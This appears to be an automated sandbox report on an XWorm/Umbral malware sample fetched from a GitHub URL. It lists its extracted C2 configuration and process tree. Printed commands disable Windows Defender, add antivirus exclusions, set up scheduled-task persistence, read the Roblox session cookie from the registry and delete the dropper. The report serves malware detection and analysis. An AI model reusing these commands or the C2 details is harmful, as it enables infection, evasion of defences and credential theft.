Analysis
-
max time kernel
54s -
max time network
55s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
06/09/2024, 14:59 UTC
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://github.com/3z02/Dont-/raw/main/xWorm+v5.6.exe
Resource
win10v2004-20240802-en
General
-
Target
https://github.com/3z02/Dont-/raw/main/xWorm+v5.6.exe
Malware Config
Extracted
xworm
5.0
japanese-longer.gl.at.ply.gg:28461
MDePCKGcpJNC9Aji
-
Install_directory
%AppData%
-
install_file
XClient.exe
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral1/files/0x0008000000023447-207.dat family_umbral behavioral1/memory/5816-217-0x000002A54AA20000-0x000002A54AA60000-memory.dmp family_umbral -
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/files/0x000c000000023420-198.dat family_xworm behavioral1/memory/5768-218-0x0000000000FC0000-0x0000000000FF8000-memory.dmp family_xworm -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
pid Process 4712 powershell.exe 1616 powershell.exe 4492 powershell.exe 5012 powershell.exe 4020 powershell.exe 5756 powershell.exe 6072 powershell.exe 2548 powershell.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts Grabb.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation xWorm+v5.6.exe Key value queried \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation Cloner.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk Cloner.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk Cloner.exe -
Executes dropped EXE 3 IoCs
pid Process 5176 xWorm+v5.6.exe 5768 Cloner.exe 5816 Grabb.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XClient = "C:\\Users\\Admin\\AppData\\Roaming\\XClient.exe" Cloner.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 17 raw.githubusercontent.com 18 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 39 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 740 cmd.exe 5404 PING.EXE -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1076 wmic.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
NTFS ADS 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\Downloads\Unconfirmed 119546.crdownload:SmartScreen msedge.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 5404 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2044 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 824 msedge.exe 824 msedge.exe 392 msedge.exe 392 msedge.exe 4236 identity_helper.exe 4236 identity_helper.exe 3900 msedge.exe 3900 msedge.exe 5816 Grabb.exe 5816 Grabb.exe 6072 powershell.exe 6072 powershell.exe 6072 powershell.exe 4712 powershell.exe 4712 powershell.exe 4712 powershell.exe 1616 powershell.exe 1616 powershell.exe 1616 powershell.exe 2392 powershell.exe 2392 powershell.exe 2392 powershell.exe 2548 powershell.exe 2548 powershell.exe 5628 taskmgr.exe 5628 taskmgr.exe 2548 powershell.exe 5012 powershell.exe 5012 powershell.exe 5628 taskmgr.exe 5012 powershell.exe 4020 powershell.exe 4020 powershell.exe 4020 powershell.exe 5628 taskmgr.exe 5756 powershell.exe 5756 powershell.exe 5756 powershell.exe 4492 powershell.exe 4492 powershell.exe 4492 powershell.exe 5628 taskmgr.exe 5768 Cloner.exe 5768 Cloner.exe 5628 taskmgr.exe 5628 taskmgr.exe 5628 taskmgr.exe 5628 taskmgr.exe 5628 taskmgr.exe 5628 taskmgr.exe 5628 taskmgr.exe 5628 taskmgr.exe 5628 taskmgr.exe 5628 taskmgr.exe 5628 taskmgr.exe 5628 taskmgr.exe 5628 taskmgr.exe 5628 taskmgr.exe 5628 taskmgr.exe 5628 taskmgr.exe 5628 taskmgr.exe 5628 taskmgr.exe 5628 taskmgr.exe 5628 taskmgr.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
pid Process 392 msedge.exe 392 msedge.exe 392 msedge.exe 392 msedge.exe 392 msedge.exe 392 msedge.exe 392 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 5768 Cloner.exe Token: SeDebugPrivilege 5816 Grabb.exe Token: SeIncreaseQuotaPrivilege 5956 wmic.exe Token: SeSecurityPrivilege 5956 wmic.exe Token: SeTakeOwnershipPrivilege 5956 wmic.exe Token: SeLoadDriverPrivilege 5956 wmic.exe Token: SeSystemProfilePrivilege 5956 wmic.exe Token: SeSystemtimePrivilege 5956 wmic.exe Token: SeProfSingleProcessPrivilege 5956 wmic.exe Token: SeIncBasePriorityPrivilege 5956 wmic.exe Token: SeCreatePagefilePrivilege 5956 wmic.exe Token: SeBackupPrivilege 5956 wmic.exe Token: SeRestorePrivilege 5956 wmic.exe Token: SeShutdownPrivilege 5956 wmic.exe Token: SeDebugPrivilege 5956 wmic.exe Token: SeSystemEnvironmentPrivilege 5956 wmic.exe Token: SeRemoteShutdownPrivilege 5956 wmic.exe Token: SeUndockPrivilege 5956 wmic.exe Token: SeManageVolumePrivilege 5956 wmic.exe Token: 33 5956 wmic.exe Token: 34 5956 wmic.exe Token: 35 5956 wmic.exe Token: 36 5956 wmic.exe Token: SeIncreaseQuotaPrivilege 5956 wmic.exe Token: SeSecurityPrivilege 5956 wmic.exe Token: SeTakeOwnershipPrivilege 5956 wmic.exe Token: SeLoadDriverPrivilege 5956 wmic.exe Token: SeSystemProfilePrivilege 5956 wmic.exe Token: SeSystemtimePrivilege 5956 wmic.exe Token: SeProfSingleProcessPrivilege 5956 wmic.exe Token: SeIncBasePriorityPrivilege 5956 wmic.exe Token: SeCreatePagefilePrivilege 5956 wmic.exe Token: SeBackupPrivilege 5956 wmic.exe Token: SeRestorePrivilege 5956 wmic.exe Token: SeShutdownPrivilege 5956 wmic.exe Token: SeDebugPrivilege 5956 wmic.exe Token: SeSystemEnvironmentPrivilege 5956 wmic.exe Token: SeRemoteShutdownPrivilege 5956 wmic.exe Token: SeUndockPrivilege 5956 wmic.exe Token: SeManageVolumePrivilege 5956 wmic.exe Token: 33 5956 wmic.exe Token: 34 5956 wmic.exe Token: 35 5956 wmic.exe Token: 36 5956 wmic.exe Token: SeDebugPrivilege 6072 powershell.exe Token: SeDebugPrivilege 4712 powershell.exe Token: SeDebugPrivilege 1616 powershell.exe Token: SeDebugPrivilege 2392 powershell.exe Token: SeDebugPrivilege 2548 powershell.exe Token: SeDebugPrivilege 5628 taskmgr.exe Token: SeSystemProfilePrivilege 5628 taskmgr.exe Token: SeCreateGlobalPrivilege 5628 taskmgr.exe Token: SeDebugPrivilege 5012 powershell.exe Token: SeDebugPrivilege 4020 powershell.exe Token: SeIncreaseQuotaPrivilege 4888 wmic.exe Token: SeSecurityPrivilege 4888 wmic.exe Token: SeTakeOwnershipPrivilege 4888 wmic.exe Token: SeLoadDriverPrivilege 4888 wmic.exe Token: SeSystemProfilePrivilege 4888 wmic.exe Token: SeSystemtimePrivilege 4888 wmic.exe Token: SeProfSingleProcessPrivilege 4888 wmic.exe Token: SeIncBasePriorityPrivilege 4888 wmic.exe Token: SeCreatePagefilePrivilege 4888 wmic.exe Token: SeBackupPrivilege 4888 wmic.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 392 msedge.exe 392 msedge.exe 392 msedge.exe 392 msedge.exe 392 msedge.exe 392 msedge.exe 392 msedge.exe 392 msedge.exe 392 msedge.exe 392 msedge.exe 392 msedge.exe 392 msedge.exe 392 msedge.exe 392 msedge.exe 392 msedge.exe 392 msedge.exe 392 msedge.exe 392 msedge.exe 392 msedge.exe 392 msedge.exe 392 msedge.exe 392 msedge.exe 392 msedge.exe 392 msedge.exe 392 msedge.exe 392 msedge.exe 392 msedge.exe 392 msedge.exe 392 msedge.exe 392 msedge.exe 392 msedge.exe 392 msedge.exe 392 msedge.exe 392 msedge.exe 392 msedge.exe 392 msedge.exe 392 msedge.exe 392 msedge.exe 392 msedge.exe 392 msedge.exe 392 msedge.exe 392 msedge.exe 392 msedge.exe 392 msedge.exe 392 msedge.exe 392 msedge.exe 392 msedge.exe 392 msedge.exe 5628 taskmgr.exe 5628 taskmgr.exe 5628 taskmgr.exe 5628 taskmgr.exe 5628 taskmgr.exe 5628 taskmgr.exe 5628 taskmgr.exe 5628 taskmgr.exe 5628 taskmgr.exe 5628 taskmgr.exe 5628 taskmgr.exe 5628 taskmgr.exe 5628 taskmgr.exe 5628 taskmgr.exe 5628 taskmgr.exe 5628 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 392 msedge.exe 392 msedge.exe 392 msedge.exe 392 msedge.exe 392 msedge.exe 392 msedge.exe 392 msedge.exe 392 msedge.exe 392 msedge.exe 392 msedge.exe 392 msedge.exe 392 msedge.exe 392 msedge.exe 392 msedge.exe 392 msedge.exe 392 msedge.exe 392 msedge.exe 392 msedge.exe 392 msedge.exe 392 msedge.exe 392 msedge.exe 392 msedge.exe 392 msedge.exe 392 msedge.exe 5628 taskmgr.exe 5628 taskmgr.exe 5628 taskmgr.exe 5628 taskmgr.exe 5628 taskmgr.exe 5628 taskmgr.exe 5628 taskmgr.exe 5628 taskmgr.exe 5628 taskmgr.exe 5628 taskmgr.exe 5628 taskmgr.exe 5628 taskmgr.exe 5628 taskmgr.exe 5628 taskmgr.exe 5628 taskmgr.exe 5628 taskmgr.exe 5628 taskmgr.exe 5628 taskmgr.exe 5628 taskmgr.exe 5628 taskmgr.exe 5628 taskmgr.exe 5628 taskmgr.exe 5628 taskmgr.exe 5628 taskmgr.exe 5628 taskmgr.exe 5628 taskmgr.exe 5628 taskmgr.exe 5628 taskmgr.exe 5628 taskmgr.exe 5628 taskmgr.exe 5628 taskmgr.exe 5628 taskmgr.exe 5628 taskmgr.exe 5628 taskmgr.exe 5628 taskmgr.exe 5628 taskmgr.exe 5628 taskmgr.exe 5628 taskmgr.exe 5628 taskmgr.exe 5628 taskmgr.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 5768 Cloner.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 392 wrote to memory of 3000 392 msedge.exe 83 PID 392 wrote to memory of 3000 392 msedge.exe 83 PID 392 wrote to memory of 2056 392 msedge.exe 84 PID 392 wrote to memory of 2056 392 msedge.exe 84 PID 392 wrote to memory of 2056 392 msedge.exe 84 PID 392 wrote to memory of 2056 392 msedge.exe 84 PID 392 wrote to memory of 2056 392 msedge.exe 84 PID 392 wrote to memory of 2056 392 msedge.exe 84 PID 392 wrote to memory of 2056 392 msedge.exe 84 PID 392 wrote to memory of 2056 392 msedge.exe 84 PID 392 wrote to memory of 2056 392 msedge.exe 84 PID 392 wrote to memory of 2056 392 msedge.exe 84 PID 392 wrote to memory of 2056 392 msedge.exe 84 PID 392 wrote to memory of 2056 392 msedge.exe 84 PID 392 wrote to memory of 2056 392 msedge.exe 84 PID 392 wrote to memory of 2056 392 msedge.exe 84 PID 392 wrote to memory of 2056 392 msedge.exe 84 PID 392 wrote to memory of 2056 392 msedge.exe 84 PID 392 wrote to memory of 2056 392 msedge.exe 84 PID 392 wrote to memory of 2056 392 msedge.exe 84 PID 392 wrote to memory of 2056 392 msedge.exe 84 PID 392 wrote to memory of 2056 392 msedge.exe 84 PID 392 wrote to memory of 2056 392 msedge.exe 84 PID 392 wrote to memory of 2056 392 msedge.exe 84 PID 392 wrote to memory of 2056 392 msedge.exe 84 PID 392 wrote to memory of 2056 392 msedge.exe 84 PID 392 wrote to memory of 2056 392 msedge.exe 84 PID 392 wrote to memory of 2056 392 msedge.exe 84 PID 392 wrote to memory of 2056 392 msedge.exe 84 PID 392 wrote to memory of 2056 392 msedge.exe 84 PID 392 wrote to memory of 2056 392 msedge.exe 84 PID 392 wrote to memory of 2056 392 msedge.exe 84 PID 392 wrote to memory of 2056 392 msedge.exe 84 PID 392 wrote to memory of 2056 392 msedge.exe 84 PID 392 wrote to memory of 2056 392 msedge.exe 84 PID 392 wrote to memory of 2056 392 msedge.exe 84 PID 392 wrote to memory of 2056 392 msedge.exe 84 PID 392 wrote to memory of 2056 392 msedge.exe 84 PID 392 wrote to memory of 2056 392 msedge.exe 84 PID 392 wrote to memory of 2056 392 msedge.exe 84 PID 392 wrote to memory of 2056 392 msedge.exe 84 PID 392 wrote to memory of 2056 392 msedge.exe 84 PID 392 wrote to memory of 824 392 msedge.exe 85 PID 392 wrote to memory of 824 392 msedge.exe 85 PID 392 wrote to memory of 3816 392 msedge.exe 86 PID 392 wrote to memory of 3816 392 msedge.exe 86 PID 392 wrote to memory of 3816 392 msedge.exe 86 PID 392 wrote to memory of 3816 392 msedge.exe 86 PID 392 wrote to memory of 3816 392 msedge.exe 86 PID 392 wrote to memory of 3816 392 msedge.exe 86 PID 392 wrote to memory of 3816 392 msedge.exe 86 PID 392 wrote to memory of 3816 392 msedge.exe 86 PID 392 wrote to memory of 3816 392 msedge.exe 86 PID 392 wrote to memory of 3816 392 msedge.exe 86 PID 392 wrote to memory of 3816 392 msedge.exe 86 PID 392 wrote to memory of 3816 392 msedge.exe 86 PID 392 wrote to memory of 3816 392 msedge.exe 86 PID 392 wrote to memory of 3816 392 msedge.exe 86 PID 392 wrote to memory of 3816 392 msedge.exe 86 PID 392 wrote to memory of 3816 392 msedge.exe 86 PID 392 wrote to memory of 3816 392 msedge.exe 86 PID 392 wrote to memory of 3816 392 msedge.exe 86 PID 392 wrote to memory of 3816 392 msedge.exe 86 PID 392 wrote to memory of 3816 392 msedge.exe 86 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 6024 attrib.exe
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/3z02/Dont-/raw/main/xWorm+v5.6.exe1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:392 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffde23f46f8,0x7ffde23f4708,0x7ffde23f47182⤵PID:3000
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2060,4163062131641469542,15099684809572404467,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2080 /prefetch:22⤵PID:2056
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2060,4163062131641469542,15099684809572404467,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:824
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2060,4163062131641469542,15099684809572404467,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2944 /prefetch:82⤵PID:3816
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,4163062131641469542,15099684809572404467,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3236 /prefetch:12⤵PID:1880
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,4163062131641469542,15099684809572404467,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:12⤵PID:3604
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2060,4163062131641469542,15099684809572404467,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5408 /prefetch:82⤵PID:2328
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2060,4163062131641469542,15099684809572404467,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5408 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4236
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,4163062131641469542,15099684809572404467,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5472 /prefetch:12⤵PID:2088
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,4163062131641469542,15099684809572404467,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5488 /prefetch:12⤵PID:4816
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2060,4163062131641469542,15099684809572404467,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5740 /prefetch:82⤵PID:4248
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,4163062131641469542,15099684809572404467,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5700 /prefetch:12⤵PID:4416
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,4163062131641469542,15099684809572404467,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6012 /prefetch:12⤵PID:4244
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,4163062131641469542,15099684809572404467,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6060 /prefetch:12⤵PID:2532
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2060,4163062131641469542,15099684809572404467,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5508 /prefetch:82⤵PID:2704
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2060,4163062131641469542,15099684809572404467,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2612 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3900
-
-
C:\Users\Admin\Downloads\xWorm+v5.6.exe"C:\Users\Admin\Downloads\xWorm+v5.6.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
PID:5176 -
C:\Users\Admin\AppData\Local\Temp\Cloner.exe"C:\Users\Admin\AppData\Local\Temp\Cloner.exe"3⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:5768 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Cloner.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2548
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Cloner.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5012
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4020
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5756
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:2044
-
-
-
C:\Users\Admin\AppData\Local\Temp\Grabb.exe"C:\Users\Admin\AppData\Local\Temp\Grabb.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5816 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid4⤵
- Suspicious use of AdjustPrivilegeToken
PID:5956
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Grabb.exe"4⤵
- Views/modifies file attributes
PID:6024
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Grabb.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6072
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 24⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4712
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1616
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2392
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4888
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory4⤵PID:5864
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid4⤵PID:6064
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4492
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name4⤵
- Detects videocard installed
PID:1076
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Grabb.exe" && pause4⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:740 -
C:\Windows\system32\PING.EXEping localhost5⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5404
-
-
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5016
-
